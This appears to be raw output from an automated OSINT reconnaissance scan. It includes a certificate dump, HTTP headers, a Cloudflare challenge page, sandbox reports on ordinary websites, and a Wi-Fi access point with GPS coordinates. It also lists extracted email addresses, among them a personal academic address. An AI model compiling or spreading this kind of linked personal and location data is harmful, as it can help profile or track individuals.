00:d4:b5:dd:1d:03:00:c2:48:cc:5b:27:58:5a:1a:
ae:80:1c:0d:53:93:fb:69:7f:93:43:76:4d:e8:73:
1c:07:a2:3d:20:72:26:de:8b:cf:5e:08:ec:68:b1:
f5:77:47:34:1f:fc:12:0e:2f:4f:a4:d2:06:11:00:
78:b4:0d:40:fa:ba:21:05:d4:2d:c5:6d:14:14:39:
10:9a:e0:36:33:c9:8c:bb:e8:d5:33:a2:fb:d9:f7:
b5:1a:30:55:aa:67:e3:41:20:33:a1:e6:ed:c9:c3:
5b:50:61:0a:65:ba:c7:cc:f0:84:a3:6e:26:65:39:
57:a4:99:3b:03:5d:af:09:43:83:69:7f:84:65:08:
2e:12:10:15:1c:ad:1f:68:90:6a:0e:97:7d:ef:7a:
22:74:df:40:68:54:b2:c7:43:c9:cb:1c:9c:53:1d:
c4:68:a0:95:76:a1:bf:c8:18:fb:9d:30:f5:ff:26:
f8:35:1d:65:e6:a1:bc:6a:7f:70:ab:aa:3e:d6:87:
e6:17:39:3e:1e:ae:62:43:5c:02:c9:ab:c6:49:9a:
2c:43:3e:b0:0a:bb:6b:20:c9:45:43:a6:79:f2:70:
bf:69:eb:cb:fb:70:35:1a:f8:04:00:26:77:08:9e:
32:00:34:fd:0a:63:db:bc:61:0a:d9:52:e5:61:03:
a2:9b
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
FF:5A:2D:BE:67:DF:4E:45:A4:AD:A5:64:7A:31:7E:B3:39:8F:63:72
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:fluid.battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
36:be:9b:e9:c6:04:01:1c:2c:7e:ac:66:f1:b1:7c:f0:ee:5e:
a7:7a:d6:c8:9e:79:b8:66:86:a3:c0:1f:2e:30:41:c8:ab:65:
cc:a9:76:5f:0c:9a:14:80:51:ed:a7:e9:7f:f2:bd:57:5c:9b:
04:31:55:52:cc:d9:5d:ee:2c:9b:e4:bf:d8:d9:92:19:14:10:
dd:51:d3:7f:4d:75:15:b6:a8:e3:fc:04:59:c4:b7:64:9f:51:
37:3d:db:dc:3f:62:ca:61:18:50:70:5c:05:5f:99:79:0d:a0:
0e:c8:35:8d:bb:f1:5e:79:d7:db:26:ea:af:a1:41:c0:38:87:
5a:1f:f0:8e:e8:e0:82:24:9f:5a:90:83:7a:4a:a7:ba:46:58:
13:f1:c7:56:f8:28:af:a1:60:8b:a6:cd:3c:87:94:ac:c7:fc:
20:7c:c8:b3:c3:76:a4:35:2d:72:c3:ee:ac:78:b8:e1:34:03:
38:a2:6a:44:20:aa:90:30:a3:3e:ab:ba:d0:59:e6:ec:06:0e:
8d:eb:87:b7:3c:38:30:f7:f2:e8:b8:2e:15:05:ad:78:2f:e8:
3c:50:44:89:a3:d8:8d:08:05:5d:7a:05:56:82:9c:5e:c3:16:
2a:39:5a:33:90:bb:6e:e6:f1:42:6a:27:46:25:76:11:a4:8f:
4f:1d:29:59
|
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 6 | 0 | None | cf-mitigated: challenge | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=A6pUH5BrVxAUHCFyEeZi9CXof2Qs7NDG4lIwx2vXWTr3bfLmD6TvAbu9CC5NAPxdf7YdVt%2FA3H1mkzjba6JtFsZlXS70vO%2B%2Fyr5MWISSAsLD5ovFUcdhiD4vPP8ctfc%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f60726fad1912-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | W4B3PQ^00ZT00)>&0//44F6/%&_+(*01 (Net ID: 00:06:66:2A:52:3A) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:00:01 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | wr2435@it.jgec.ac.in | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 3, u'threat_score': 100, u'compromised_hosts': [], u'environment_id': 110, u'major_os_version': None, u'submit_name': u'https://wasimreja.me/', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\IsoScope_e74_IESQMMUTEX_0_519"\n "Local\\InternetShortcutMutex"\n "Local\\VERMGMTBlockListFileMutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "Local\\ZonesLockedCacheCounterMutex"\n "IsoScope_e74_IESQMMUTEX_0_519"\n "IsoScope_e74_ConnHashTable<3700>_HashTable_Mutex"\n "IsoScope_e74_IESQMMUTEX_0_331"\n "IsoScope_e74_IESQMMUTEX_0_303"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"\n "IsoScope_e74_IE_EarlyTabStart_0xd58_Mutex"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\ZonesCacheCounterMutex"\n "UpdatingNewTabPageData"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3700"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': 
u'"185.199.109.153:443"\n "142.250.189.202:443"\n "104.18.28.243:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"fonts.googleapis.com"\n "unicons.iconscout.com"\n "wasimreja.me"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"<a href="https://www.linkedin.com/in/wasimreja/" target="_blank"" (Indicator: "linkedin.com")\n "<a href="https://twitter.com/_wasimreja" target="_blank" class="home-social-icon">" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt"></i>" (Indicator: "twitter")\n "<i class="uil uil-twitter-alt contact-icon"></i>" (Indicator: "twitter")\n "Twitter" (Indicator: "twitter")\n "<a href="https://twitter.com/_wasimreja" class="footer-social" target="_blank">" (Indicator: "twitter")\n "<a href="https://www.linkedin.com/in/wasimreja/" class="footer-social"" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar41C.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar38D.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', 
u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "Cab38C.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab38C.tmp]- [targetUID: 00000000-00002812]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"favicon_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "silence_1_.gif" has type "GIF image data version 89a 500 x 682"- [targetUID: N/A]\n "whats%20cooking_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "music%20player_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "task%20buddy_1_.png" has type "PNG image data 1263 x 700 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "Tar41C.tmp" has type "data"- Location: [%TEMP%\\Tar41C.tmp]- [targetUID: 00000000-00002812]\n "swiper-bundle.min_1_.js" has type "ASCII text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "gcr%20leaderboard_1_.png" has type "PNG image data 1919 
x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "typing%20speed%20test_1_.png" has type "PNG image data 1920 x 874 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "notes%20mini_1_.png" has type "PNG image data 1920 x 838 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00002812]\n "sandesh_1_.jpg" has type "JPEG image data Exif standard: [TIFF image data big-endian direntries=7 orientation=upper-left xresolution=98 yresolution=106 resolutionunit=3 software=Adobe Photoshop CC 2017 (Windows) datetime=2020:06:20 11:34:14] progressive precision 8 1920x850 components 3"- [targetUID: N/A]\n "line_1_.css" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "quizzler_1_.jpg" has type "JPEG image data JFIF standard 1.01 aspect ratio density 1x1 segment length 16 baseline precision 8 1652x805 components 3"- [targetUID: N/A]\n "book%20finder_1_.png" has type "PNG image data 1263 x 684 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "dictionary%20app_1_.png" has type "PNG image data 1280 x 587 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "avatar_1_.png" has type "PNG image data 500 x 500 8-bit/color RGBA non-interlaced"- [targetUID: N/A]\n "urlref_httpswasimreja.me" has type "HTML document UTF-8 Unicode text with very long lines with CRLF line terminators"- [targetUID: N/A]\n "unicons-10_1_.eot" has type "Embedded OpenType (EOT) unicons-10 family"- [targetUID: N/A]'}, {u'category': u'Network Related', u'origin': u'File/Memory', u'identifier': u'string-3', u'name': u'Found potential URL in binary/memory', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', 
u'capec_id': None, u'attck_id': u'T1071', u'relevance': 10, u'threat_level': 0, u'type': 2, u'description': u'Pattern match: "https://wasimreja.me/"\n Pattern match: "https://wasimreja.me"\n Pattern match: "https://swiperjs.com"\n Pattern match: "C.JgU/0$"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicCerLisCA2011_2011-03-29.crl0]+Q0O0M+0Ahttp://www.microsoft.com/pki/certs/MicCerLisCA2011_2011-03-29.crt0U00"\n Pattern match: "crl.microsoft.com/pki/crl/products/MicRooCerAut_2010-06-23.crl0Z+N0L0J+0"\n Pattern match: "www.microsoft.com0"\n Pattern match: "https://wasimreja.me/assets/img/opengraph.png"\n Pattern match: "https://fonts.googleapis.com"\n Pattern match: "https://fonts.gstatic.com"\n Pattern match: "https://fonts.googleapis.com/css2?family=Poppins:wght@400;500;600&display=swap"\n Pattern match: "https://unicons.iconscout.com/release/v4.0.0/css/line.css"\n Pattern match: "https://www.linkedin.com/in/wasimreja/"\n Pattern match: "https://github.com/wasimreja"\n Pattern match: "https://twitter.com/_wasimreja"\n Pattern match: "https://www.instagram.com/_wasimreja"\n Pattern match: "http://www.w3.org/2000/svg"\n Pattern match: "http://www.w3.org/1999/xlink"\n Pattern match: "https://notes-mini.vercel.app/"\n Pattern match: "https://typing-speed-test.onrender.com/"\n Pattern match: "https://gcr-leaderboard.vercel.app/"\n Pattern match: "https://book-finder.onrender.com/"\n Pattern match: "http://whats-cooking.vercel.app/"\n Pattern match: "https://task-buddy.netlify.app/"\n Pattern match: "https://dictionary-app.onrender.com/"\n Pattern match: "https://quizzler.vercel.app/"\n Pattern match: "https://wasimreja.github.io/music-player/"\n Pattern match: "https://github.com/wasimreja/sandesh"\n Heuristic match: "wr2435@it.jgec.ac.in"\n Pattern match: "https://instagram.com/_wasimreja"\n Heuristic match: "fonts.googleapis.com"\n Heuristic match: "unicons.iconscout.com"\n Heuristic match: "wasimreja.me"\n Pattern match: 
"https://wasimreja.me/Accept-Language"\n Pattern match: "ns.adobe.com/xap/1.0/"\n Pattern match: "http://www.w3.org/1999/02/22-rdf-syntax-ns#"\n Pattern match: "http://fontello.comIconscoutunicons-13Regularunicons-13unicons-13Version"\n Pattern match: "http://fontello.comIconscoutunicons-12Regularunicons-12unicons-12Version"\n Pattern match: "http://fontello.comIconscoutunicons-0Regularunicons-0unicons-0Version"\n Pattern match: "http |
| 2023-05-12 02:53:39 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"X_Cache_Hits": "DISPLAY_UTF8", "X_Github_Request_Id": "DISPLAY_UTF8", "Age": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "X_Served_By": "DISPLAY_UTF8", "X_Cache": "DISPLAY_UTF8", "X_Timer": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Etag": "DISPLAY_UTF8", "X_Fastly_Request_Id": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Via": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Content_Security_Policy": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Accept_Ranges": "DISPLAY_UTF8"}, "X_Github_Request_Id": ["8A7E:0CB6:1A24B9D:28318AF:645D907B"], "Age": ["151"], "X_Cache_Hits": ["1"], "Vary": ["Accept-Encoding"], "X_Served_By": ["cache-chi-klot8100035-CHI"], "X_Cache": ["HIT"], "X_Timer": ["S1683853586.391035,VS0,VE4"], "Connection": ["keep-alive"], "Etag": ["W/\"64556a8c-239b\""], "X_Fastly_Request_Id": ["b0816cb365cc757f5f8cced0af110244f06dfba5"], "Content_Type": ["text/html; charset=utf-8"], "Via": ["1.1 varnish"], "Date": ["<REDACTED>"], "Content_Security_Policy": ["default-src 'none'; style-src 'unsafe-inline'; img-src data:; connect-src 'self'"], "Server": ["GitHub.com"], "Accept_Ranges": ["bytes"]} | 185.199.108.153 |
| 2023-05-12 03:15:35 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f60715ea2423d')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="o9rkiN63h_dC1MXH2ewnO9VeNInpcF4XTtlC3.Ope.M-1683860062-0-AdUguWWDLVlZxsWb6e1bnqomUGdvKH9Hr8OR9XhDVbWy_UNZDFZLD8-BRJaoUzBMnZ4MBtuUzqAf-y1NVIXFBZc2zpThNEMVcsemZ6G3H2y2RdwaGI22EiA1S326BJRlVE4Ae2G6hV1-y96EsTpLgRijeuFFSHz05y1jK0LMHQT6Yul8T61BIXmvzdMkcho4NRYjRqIaGwnrNt3GHyXHuLD9Kg0Z1PswrdZsR5u8cj9YNRG5tPHVjIwdXSU_H7FvumTVKSb2DSCVu7zno--l-x_ursgemNqA1Eu9esEfAcEZErO2ynNNPle4iy35Q-002AvCnrTStuzsV9WenG-kzkwfzH4Bgm9BgZjZ2SzceeiUvpx0VbFQ3pFatklpu5sVBuMECIKb-C35grQD9hIe5CnF2tIuq3LpSjTYWdY_G-taMdpge2EijRLIBI6Kfm3KCKgrmIm-M_kaOkhT6zwNZKrbtrmrwvHusBRZM8mDqXK6BGxQEYolgs9YfSL0l717dfEhPntRoL6ZMAEy83CFiWTndZ1SzKSh5MxSqRh8JYSn7-hlp9tzN-SB8T0mkCkP87rm0gHB2Nc1YNmJH6a6djf3APAwio8E6jQftS4RNyx5lSUUZ_BnFys-ZXFUzYbxVs_s5utzzMkEYOyUrEjMwlbzK1bmHQXnmHfBHDfW-9w0KMV_I2KXURlKdWp_aVGaYPgU9RQpOrOu5jXRwZ5WWo3nXJCoJubmH-xr5xweBUbZG-SrvNgarDFttshord388LcpI4vf_DPi5QAhha2ONgO4nEYcsvGjPWmE5gBNnwndanRmSOkYLNoIKdyVDvafFa_9wxBk6pKwvUGADjN1yYITiFNd4Av6OjiMF0eCD0B-rMcf1K_RyJAW0Q63e569MyoALgsa5LuF6A9Fao0NuRtVokTtKXFjE683wyQoxz2rVadCdcz1SAkPujj4gsPBtzmyTzaZ0eAhZEu4ZktRZ3yW_kCzFaoZlWWXPLmMSYOISs0fLmCihg46UN9oyRLijuEDM_jHg4LTV2TnCzG6rH5ukfU2q3hIf7DNVmpydIO4964Rwd7yky69HogBFyvVcLvLJiau__mlfv9Zd8rpuWQeyviCGIKTRzsIwfkMqNPNyw8X9ilDjYLz8Er-YKFTiBYzKowqSDcLfsInmyu-GY3Q4CRe6azk1q2PDI5jsKPqVXZnDO6xM5WOgDfsUs8jCGX-Y7pnubkolyphepCOCRuJYkPER9RlRKn9TP1Iu5pT3zvM--Qn_g2xND5bfgguBbZ7_xzC6vrG4uq7pRN86Jyn1eh0aJoS1o3moXbGaKVZMFxn9St9eHP_LBzqatvidcntyoQnZyEuvoBGzmB7bxsXvanE_k1kK-flL0DxtFCoSL_hYsi2QdekeHyb0moJOnxYk8nOvpGRVJW2aeFOS6zzQYrTf1ZYVM7iyRgHYPN8uylozJaFR27equ7FqddcsitgcuSFaFlYteDEO4eAuImRVXD5QnWHTDDLK-J-a7cd7n5pHrzsbNbpwPeit55PzKCpzI484EAksVFlNAkrwC4SqRB6KhjvHJRu2SsinDAvuebN5jt7N0scno6aUyjSzxwSSpVf6bZrrSm-p-5sQDUjLp64NRXWVN8wvA3_1f2gF_Vosd3y9Sp0fSOsU2F6EIdZdWuHYetxrmSNE6AHJ3RT_C04YBvG6_Q9PkJsb86B49AEElj23DQaHfl1GA9qGlbppJY5scudrsxneqxrD58hLbvdzxrWwdzLczRciePhFl8OKW5eaSkWmK-s65YIEnBLOSnaXmYwPzvjg8f67iFNC-e3l5m0MDQVx52PRj2vf8DWG_AfPmw2afbxcw9ppplZ9oiixK20YnEv54WswcS_oGpXEwjRNaflmeY-Y06FMexN5
UEccQFy7OcRAYdF-UVs7RwoJUdks1JoRoK9OtuCZ-KgdWRayYvkrBZh1irLAwBozTjJSzJVowS3-M9iXqAD-o4GZBMK9eAUQlmuEIIQAf4f1TCN4loJA-4yETDBP4eorxfgJm9hdR63VxYMIHAkqccOTphwj01rk_8nG1uU4rJrScaAyK8AS_kQ2UytoRgp8VoNR_d7rmE_GZgpIDjlZ7mYr5nvR22Zau-p4gmFaOvdsk2jjUaqisfuqgg6D7ilZ29ja7S9UD52x-HqjxmP4JRdKMs3zwtM2aBKs0yMaMXiLr0T0j3f1FktvbG7soBZaonR97fM1qjr28AlqpELx3WuIvTiKLBZ2gxE_Tjenn0-IC2XQdN8IEIXfw9F7jVJZ6FyGJ9Yx4YqJ3kmX0qXi9iX1jb-Y3YZwJ6j4tTSRr8_tAhbW33UaKc3ULwKwGZ9g9Ru0mgnq0hVusSVy31FLGpM6QZZ4iZhokIoEs5L-lSF6-Qt-6-GQgAAhgrRM_mFp17cJjzl0kVV9PTe5Y-EYxGWlJKX7FVEGARcAfwWh_GITW_xYClIpKaR9CMUgzm4MqfOkVCd-6Z7AHBczBYiCIlRejFdx7yIdIPo__-pVcOwTW-jE9Y6Ncj1gf1h">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'www.ayhu.xyz',
cType: 'managed',
cNounce: '12933',
cRay: '7c5f60715ea2423d',
cHash: '4c530bdfb62a335',
cUPMDTk: "\/?__cf_chl_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly93d3cuYXlodS54eXov',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: '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',
t: 'MTY4Mzg2MDA2Mi45MzcwMDA=',
m: 'LwOsDwqRkfr0bjyiLObl7sEK+vITUZuaPQE/A6GDF60=',
i1: 'zy3+9oq0kQS8g0MofYLvVQ==',
i2: 'Pt5t/C6ZQh8wsZRxhTvpYw==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'fqLp1aUJ26MbHPQQbwfAUprhzy4RljM1W5Ogim1le2Q=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f60715ea2423d');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f60715ea2423d';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=JtV8r0GkxGajl1GKjCT6mPEPAroD8NWzOwVMv5NMEkM-1683860062-0-gaNycGzNCiU" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | zhihu (Category: social)
https://www.zhihu.com/people/login | login |
| 2023-05-12 02:59:57 | Affiliate - Email Address | No | E-Mail Address Extractor | 0 | 0 | 3 | 0 | None | support@bigmarker.com | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://this.props.pagesize/2)),e.currentdatapageendindex=math.min(e.currentdatapagestartindex+this.props.pagesize,this.props.rows.length-1),r=!0', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 25, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 160, u'major_os_version': None, u'submit_name': u'https://www.bigmarker.com/taxadmin/The-Inbound-Customer-Experience?bmid=a85668108cb3&bmid_type=member', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"SM0:3704:120:WilError_01"\n "SM0:3704:304:WilStaging_02"\n "Local\\SM0:3704:304:WilStaging_02"\n "InternetShortcutMutex"\n "Local\\SM0:3704:120:WilError_01"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"3.235.65.215:443"\n "138.91.254.96:443"\n "13.227.21.122:443"\n "142.251.2.157:443"\n "151.101.0.176:443"\n "185.199.108.153:443"\n "13.227.21.6:443"\n "142.251.46.164:443"\n "151.101.2.137:443"\n "162.247.243.29:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': 
u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"api.edgeoffer.microsoft.com"\n "bam.nr-data.net"\n "checkout.stripe.com"\n "d1f74no97k6yi9.cloudfront.net"\n "d5ln38p3754yc.cloudfront.net"\n "js-agent.newrelic.com"\n "stats.g.doubleclick.net"\n "webrtc.github.io"\n "www.bigmarker.com"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'Found string ""paypal.com"," (Indicator: "dir "; File: "wallet-checkout-eligible-sites-pre-stable.json")\n Found string ""baysidebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""comeherebuddy.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""www.facebook.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string ""linkedin.com"," (Indicator: "dir "; File: "wallet-stable.json")\n Found string "<meta name="twitter:card" content="summary_large_image">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:site" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n Found string "<meta name="twitter:creator" content="@bigmarker">" (Indicator: "dir "; File: "urlref_httpswww.bigmarker.comtaxadminThe-Inbound-Customer-Experiencebmid_a85668108cb3_bmid_type_member")\n 